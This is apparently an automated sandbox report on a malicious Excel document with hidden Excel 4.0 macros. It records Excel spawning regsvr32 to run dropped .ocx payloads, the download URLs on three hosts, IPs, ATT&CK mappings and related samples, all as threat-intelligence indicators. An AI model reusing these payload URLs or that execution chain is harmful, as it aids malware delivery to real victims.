
Windows Analysis Report survey-1384723731.xls

Overview

General Information

Sample Name: survey-1384723731.xls
Analysis ID: 528587
MD5: 00bec62d14bc9f8a32948f2c6c512a8f
SHA1: d2ef80f029f8f035947f1bc6f5929d225374dda4
SHA256: 59d14a53849a19d0dd5ccaf63a85955adbd313c9ec7d92422c0fcdda357b8ce0

Detection

Hidden Macro 4.0
Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Yara signature match
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Document contains embedded VBA macros
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 408 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 2192 cmdline: "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2604 cmdline: "C:\Windows\System32\regsvr32.exe" C:\Datop\bestb.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1184 cmdline: "C:\Windows\System32\regsvr32.exe" C:\Datop\bestc.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: survey-1384723731.xls | Rule: SUSP_Excel4Macro_AutoOpen | Description: Detects Excel4 macro use with auto open / close | Author: John Lambert @JohnLaTwC
Strings:
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x3b2aa:$s1: Excel
  • 0x3c378:$s1: Excel
  • 0x3521:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
Source: survey-1384723731.xls | Rule: JoeSecurity_HiddenMacro | Description: Yara detected hidden Macro 4.0 in Excel | Author: Joe Security

Dropped Files

Source: C:\Users\user\Desktop\survey-1384723731.xls | Rule: SUSP_Excel4Macro_AutoOpen | Description: Detects Excel4 macro use with auto open / close | Author: John Lambert @JohnLaTwC
Strings:
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x3b2aa:$s1: Excel
  • 0x3c378:$s1: Excel
  • 0x3521:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
Source: C:\Users\user\Desktop\survey-1384723731.xls | Rule: JoeSecurity_HiddenMacro | Description: Yara detected hidden Macro 4.0 in Excel | Author: Joe Security

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team | Data: Command: "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx, CommandLine: "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 408, ProcessCommandLine: "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx, ProcessId: 2192

Jbx Signature Overview

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown | HTTPS traffic detected: 192.185.79.2:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 192.185.129.7:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 103.247.11.218:443 -> 192.168.2.22:49169 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.185.79.2:443
Source: global traffic | DNS query: name: klevvrtech.com
Source: global traffic | HTTP traffic detected: GET /zxywJAC24KJ/ji.html HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: klevvrtech.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /OYcMRJbL/ji.html HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: srkcampus.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /fbmKk6n48G/ji.html HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: rstebet.co.id | Connection: Keep-Alive
Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox View | IP Address: 192.185.129.7 192.185.129.7
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown | Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49167 -> 443
Source: regsvr32.exe, 00000003.00000002.448849757.0000000004900000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.444363862.00000000048A0000.00000002.00020000.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: regsvr32.exe, 00000003.00000002.448849757.0000000004900000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.444363862.00000000048A0000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com
Source: regsvr32.exe, 00000003.00000002.448849757.0000000004900000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.444363862.00000000048A0000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com/
Source: regsvr32.exe, 00000003.00000002.449141454.0000000004AE7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.445815046.0000000004A87000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437931055.0000000004A47000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: regsvr32.exe, 00000003.00000002.449141454.0000000004AE7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.445815046.0000000004A87000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437931055.0000000004A47000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: regsvr32.exe, 00000003.00000002.447880847.0000000003A80000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.444010590.0000000003A90000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437079532.00000000039E0000.00000002.00020000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.447092500.0000000001C80000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.443656865.0000000001D20000.00000002.00020000.sdmp | String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000003.00000002.449141454.0000000004AE7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.445815046.0000000004A87000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437931055.0000000004A47000.00000002.00020000.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: regsvr32.exe, 00000003.00000002.449141454.0000000004AE7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.445815046.0000000004A87000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437931055.0000000004A47000.00000002.00020000.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000003.00000002.447880847.0000000003A80000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.444010590.0000000003A90000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437079532.00000000039E0000.00000002.00020000.sdmp | String found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 00000003.00000002.448849757.0000000004900000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.444363862.00000000048A0000.00000002.00020000.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: regsvr32.exe, 00000003.00000002.449141454.0000000004AE7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.445815046.0000000004A87000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437931055.0000000004A47000.00000002.00020000.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: regsvr32.exe, 00000003.00000002.448849757.0000000004900000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.444363862.00000000048A0000.00000002.00020000.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: regsvr32.exe, 00000004.00000002.444363862.00000000048A0000.00000002.00020000.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ji[1].htm
Source: unknown | DNS traffic detected: queries for: klevvrtech.com

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: Enable Editing 18 19 I OK I 20 (D PROTECTED VIEW Be careful- files from the 1nterne cted View.
Source: Screenshot number: 4 | Screenshot OCR: Enable Content 25 26 G) SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 30
Source: Screenshot number: 8 | Screenshot OCR: Enable Editing 18 19 20 (D PROTECTED VIEW Be careful- files from the Internet can contain viruses
Source: Screenshot number: 8 | Screenshot OCR: Enable Content 25 26 G) SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 30
Source: Document image extraction number: 0 | Screenshot OCR: Enable Editing 0 PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless yo
Source: Document image extraction number: 0 | Screenshot OCR: Enable Content OSECURITY WARNING Macros have been disabled. Enable Content om If you are using a m
Source: Document image extraction number: 1 | Screenshot OCR: Enable Editing (D PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless y
Source: Document image extraction number: 1 | Screenshot OCR: Enable Content OSECURITY WARNING Macros have been disabled. Enable Content om If you are using a m
Source: Screenshot number: 12 | Screenshot OCR: Enable Editing d 18 19 20 (D PROTECTED VIEW Be careful - files from the Internet can contain viru
Source: Screenshot number: 12 | Screenshot OCR: Enable Content 25 26 G) SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 30
Source: survey-1384723731.xls, type: SAMPLE | Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\survey-1384723731.xls, type: DROPPED | Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: survey-1384723731.xls | Macro extractor: Sheet name: Buk1
Source: survey-1384723731.xls | Macro extractor: Sheet name: Buk4
Source: survey-1384723731.xls | Macro extractor: Sheet name: Buk6
Source: survey-1384723731.xls | Macro extractor: Sheet name: Buk7
Source: survey-1384723731.xls | Macro extractor: Sheet name: Buk2
Source: survey-1384723731.xls | Macro extractor: Sheet name: Buk3
Source: survey-1384723731.xls | OLE indicator, VBA macros: true
Source: survey-1384723731.xls.0.dr | OLE indicator, VBA macros: true
Source: 91C4.tmp.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: survey-1384723731.xls | OLE indicator, Workbook stream: true
Source: survey-1384723731.xls.0.dr | OLE indicator, Workbook stream: true
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\bestb.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\bestc.ocx
Source: regsvr32.exe, 00000003.00000002.448849757.0000000004900000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.444363862.00000000048A0000.00000002.00020000.sdmp | Binary or memory string: .VBPud<_
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRE80D.tmp
Source: classification engine | Classification label: mal64.expl.winXLS@7/4@3/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Automated click: OK
Source: C:\Windows\System32\regsvr32.exe | Automated click: OK
Source: C:\Windows\System32\regsvr32.exe | Automated click: OK
Source: C:\Windows\System32\regsvr32.exe | Automated click: OK
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: 91C4.tmp.0.dr | Initial sample: OLE indicators vbamacros = False
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe TID: 2980 | Thread sleep count: 63 > 30
Source: C:\Windows\System32\regsvr32.exe TID: 2968 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 1200 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 2824 | Thread sleep time: -60000s >= -30000s

HIPS / PFW / Operating System Protection Evasion:

Yara detected hidden Macro 4.0 in Excel
Source: Yara match | File source: survey-1384723731.xls, type: SAMPLE
Source: Yara match | File source: C:\Users\user\Desktop\survey-1384723731.xls, type: DROPPED

Mitre Att&ck Matrix

Techniques listed by tactic; a number in parentheses is the count shown beside that technique in the matrix.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
Execution: Scripting (1); Exploitation for Client Execution (23); At (Linux); At (Windows)
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
Privilege Escalation: Process Injection (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
Defense Evasion: Disable or Modify Tools (1); Virtualization/Sandbox Evasion (1); Process Injection (1); Scripting (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
Discovery: Virtualization/Sandbox Evasion (1); File and Directory Discovery (1); System Information Discovery (2); System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer
Command and Control: Encrypted Channel (1); Non-Application Layer Protocol (2); Application Layer Protocol (13); Ingress Tool Transfer (2)
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label
klevvrtech.com | 0% | Virustotal |
rstebet.co.id | 0% | Virustotal |
srkcampus.org | 0% | Virustotal |

URLs

Source | Detection | Scanner | Label
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
https://klevvrtech.com/zxywJAC24KJ/ji.html | 2% | Virustotal |
https://klevvrtech.com/zxywJAC24KJ/ji.html | 0% | Avira URL Cloud | safe
http://www.%s.comPA | 0% | URL Reputation | safe
https://srkcampus.org/OYcMRJbL/ji.html | 0% | Avira URL Cloud | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe
https://rstebet.co.id/fbmKk6n48G/ji.html | 2% | Virustotal |
https://rstebet.co.id/fbmKk6n48G/ji.html | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

klevvrtech.com | IP: 192.185.79.2 | Active: true | Malicious: false | Antivirus Detection: none listed | Reputation: unknown
rstebet.co.id | IP: 103.247.11.218 | Active: true | Malicious: false | Antivirus Detection: none listed | Reputation: unknown
srkcampus.org | IP: 192.185.129.7 | Active: true | Malicious: false | Antivirus Detection: none listed | Reputation: unknown

Contacted URLs

https://klevvrtech.com/zxywJAC24KJ/ji.html | Malicious: false | Antivirus Detection: 2%, Virustotal; Avira URL Cloud: safe | Reputation: unknown
https://srkcampus.org/OYcMRJbL/ji.html | Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
https://rstebet.co.id/fbmKk6n48G/ji.html | Malicious: false | Antivirus Detection: 2%, Virustotal; Avira URL Cloud: safe | Reputation: unknown

URLs from Memory and Binaries

http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | Source: regsvr32.exe, 00000003.00000002.449141454.0000000004AE7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.445815046.0000000004A87000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437931055.0000000004A47000.00000002.00020000.sdmp | Malicious: false | Reputation: high
http://www.windows.com/pctv. | Source: regsvr32.exe, 00000004.00000002.444363862.00000000048A0000.00000002.00020000.sdmp | Malicious: false | Reputation: high
http://investor.msn.com | Source: regsvr32.exe, 00000003.00000002.448849757.0000000004900000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.444363862.00000000048A0000.00000002.00020000.sdmp | Malicious: false | Reputation: high
http://www.msnbc.com/news/ticker.txt | Source: regsvr32.exe, 00000003.00000002.448849757.0000000004900000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.444363862.00000000048A0000.00000002.00020000.sdmp | Malicious: false | Reputation: high
http://www.icra.org/vocabulary/. | Source: regsvr32.exe, 00000003.00000002.449141454.0000000004AE7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.445815046.0000000004A87000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437931055.0000000004A47000.00000002.00020000.sdmp | Malicious: false | Antivirus Detection: URL Reputation: safe | Reputation: unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | Source: regsvr32.exe, 00000003.00000002.447880847.0000000003A80000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.444010590.0000000003A90000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437079532.00000000039E0000.00000002.00020000.sdmp | Malicious: false | Reputation: high
http://investor.msn.com/ | Source: regsvr32.exe, 00000003.00000002.448849757.0000000004900000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.444363862.00000000048A0000.00000002.00020000.sdmp | Malicious: false | Reputation: high
http://www.%s.comPA | Source: regsvr32.exe, 00000003.00000002.447880847.0000000003A80000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.444010590.0000000003A90000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437079532.00000000039E0000.00000002.00020000.sdmp | Malicious: false | Antivirus Detection: URL Reputation: safe | Reputation: low
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | Source: regsvr32.exe, 00000003.00000002.449141454.0000000004AE7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.445815046.0000000004A87000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.437931055.0000000004A47000.00000002.00020000.sdmp | Malicious: false | Antivirus Detection: URL Reputation: safe | Reputation: unknown
http://www.hotmail.com/oe | Source: regsvr32.exe, 00000003.00000002.448849757.0000000004900000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.444363862.00000000048A0000.00000002.00020000.sdmp | Malicious: false | Reputation: high
http://servername/isapibackend.dll | Source: regsvr32.exe, 00000003.00000002.447092500.0000000001C80000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.443656865.0000000001D20000.00000002.00020000.sdmp | Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: low

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
192.185.129.7 | srkcampus.org | United States | 46606 | UNIFIEDLAYER-AS-1US | false
192.185.79.2 | klevvrtech.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false
103.247.11.218 | rstebet.co.id | Indonesia | 58487 | RUMAHWEB-AS-IDRumahwebIndonesiaCVID | false

General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 528587
Start date: 25.11.2021
Start time: 14:30:13
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 42s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: survey-1384723731.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal64.expl.winXLS@7/4@3/3
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xls
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe

Simulations

Behavior and APIs

Time | Type | Description
14:30:31 | API Interceptor | 92x Sleep call for process: regsvr32.exe modified

                    Joe Sandbox View / Context

                    IPs

                    Match | Associated Sample Name / URL | Detection
                    192.185.129.7 | survey-1378794827.xls | malicious
                    192.185.129.7 | doc-904268081.xls | malicious
                    192.185.129.7 | doc-904268081.xls | malicious
                    192.185.129.7 | http://ibaylor.psatrans.com/cmlja3lfc293ZWxsQGJheWxvci5lZHU= | malicious
                    192.185.129.7 | https://digitek.global/cinetra | malicious
                    192.185.79.2 | survey-1378794827.xls | malicious
                    103.247.11.218 | survey-1378794827.xls | malicious

                                  Domains

                                   Match | Associated Sample Name / URL | Detection | Context
                                   srkcampus.org | survey-1378794827.xls | malicious | 192.185.129.7
                                   rstebet.co.id | survey-1378794827.xls | malicious | 103.247.11.218
                                   klevvrtech.com | survey-1378794827.xls | malicious | 192.185.79.2

                                  ASN

                                   Match | Associated Sample Name / URL | Detection | Context
                                   UNIFIEDLAYER-AS-1US | survey-1378794827.xls | malicious | 192.185.79.2
                                   UNIFIEDLAYER-AS-1US | QUOTATION REQUEST DOCUMENTS - GOTO TRADING.exe | malicious | 162.240.9.164
                                   UNIFIEDLAYER-AS-1US | SecuriteInfo.com.VHO.Trojan-PSW.MSIL.Stealer.gen.30557.exe | malicious | 192.185.84.191
                                   UNIFIEDLAYER-AS-1US | Swift Copy TT.doc | malicious | 50.116.86.94
                                   UNIFIEDLAYER-AS-1US | 8M5ZqXSa28.exe | malicious | 192.185.129.44
                                   UNIFIEDLAYER-AS-1US | Change Order - Draw #3 .htm | malicious | 162.214.66.227
                                   UNIFIEDLAYER-AS-1US | new-1834138397.xls | malicious | 108.179.253.213
                                   UNIFIEDLAYER-AS-1US | new-1834138397.xls | malicious | 108.179.253.213
                                   UNIFIEDLAYER-AS-1US | new-1179494065.xls | malicious | 108.179.253.213
                                   UNIFIEDLAYER-AS-1US | Hsbc swift.exe | malicious | 192.232.249.14
                                   UNIFIEDLAYER-AS-1US | new-1179494065.xls | malicious | 108.179.253.213
                                   UNIFIEDLAYER-AS-1US | microcomputer Official Order.exe | malicious | 192.185.84.191
                                   UNIFIEDLAYER-AS-1US | Arrival Notice, CIA Awb Inv Form.pdf.exe | malicious | 70.40.220.123
                                   UNIFIEDLAYER-AS-1US | t 2021.HtML | malicious | 192.185.129.43
                                   UNIFIEDLAYER-AS-1US | New Order778880.exe | malicious | 192.185.167.112
                                   UNIFIEDLAYER-AS-1US | IyRUJT27dd.exe | malicious | 192.185.113.96
                                   UNIFIEDLAYER-AS-1US | LlDlHiVEJQ.exe | malicious | 162.241.24.173
                                   UNIFIEDLAYER-AS-1US | bomba.arm | malicious | 162.144.165.114
                                   UNIFIEDLAYER-AS-1US | PAYMENT COPY FOR YOUR INFORMATION $76,956.exe | malicious | 192.185.129.69
                                   UNIFIEDLAYER-AS-1US | Balance.xls | malicious | 192.185.113.96

                                  JA3 Fingerprints

                                   Match | Associated Sample Name / URL | Detection | Context
                                   7dcce5b76c8b17472d024758970a406b | survey-1378794827.xls | malicious | 192.185.129.7, 103.247.11.218, 192.185.79.2
                                   7dcce5b76c8b17472d024758970a406b | 6docs'pdf.ppam | malicious | 192.185.129.7, 103.247.11.218, 192.185.79.2
                                   7dcce5b76c8b17472d024758970a406b | PO201808143_330542IMG_20200710_0008.rtf | malicious | 192.185.129.7, 103.247.11.218, 192.185.79.2
                                   7dcce5b76c8b17472d024758970a406b | Order Contract_signed (4NQ39NGAY0GD).ppam | malicious | 192.185.129.7, 103.247.11.218, 192.185.79.2
                                   7dcce5b76c8b17472d024758970a406b | new-1834138397.xls | malicious | 192.185.129.7, 103.247.11.218, 192.185.79.2
                                   7dcce5b76c8b17472d024758970a406b | new-1179494065.xls | malicious | 192.185.129.7, 103.247.11.218, 192.185.79.2
                                   7dcce5b76c8b17472d024758970a406b | TT-PRIME USD242,357,59.ppam | malicious | 192.185.129.7, 103.247.11.218, 192.185.79.2
                                   7dcce5b76c8b17472d024758970a406b | TT-PRIME USD242,357,59.ppam | malicious | 192.185.129.7, 103.247.11.218, 192.185.79.2
                                   7dcce5b76c8b17472d024758970a406b | chase.xls | malicious | 192.185.129.7, 103.247.11.218, 192.185.79.2
                                   7dcce5b76c8b17472d024758970a406b | private-1915056036.xls | malicious | 192.185.129.7, 103.247.11.218, 192.185.79.2
                                   7dcce5b76c8b17472d024758970a406b | private-1910485378.xls | malicious | 192.185.129.7, 103.247.11.218, 192.185.79.2
                                   7dcce5b76c8b17472d024758970a406b | INVOICE - FIRST 2 CONTAINERS 1110.docx | malicious | 192.185.129.7, 103.247.11.218, 192.185.79.2
                                   7dcce5b76c8b17472d024758970a406b | SWIFT-MT-103.docx | malicious | 192.185.129.7, 103.247.11.218, 192.185.79.2
                                   7dcce5b76c8b17472d024758970a406b | Balance.xls | malicious | 192.185.129.7, 103.247.11.218, 192.185.79.2
                                   7dcce5b76c8b17472d024758970a406b | original shipping documents.ppam | malicious | 192.185.129.7, 103.247.11.218, 192.185.79.2
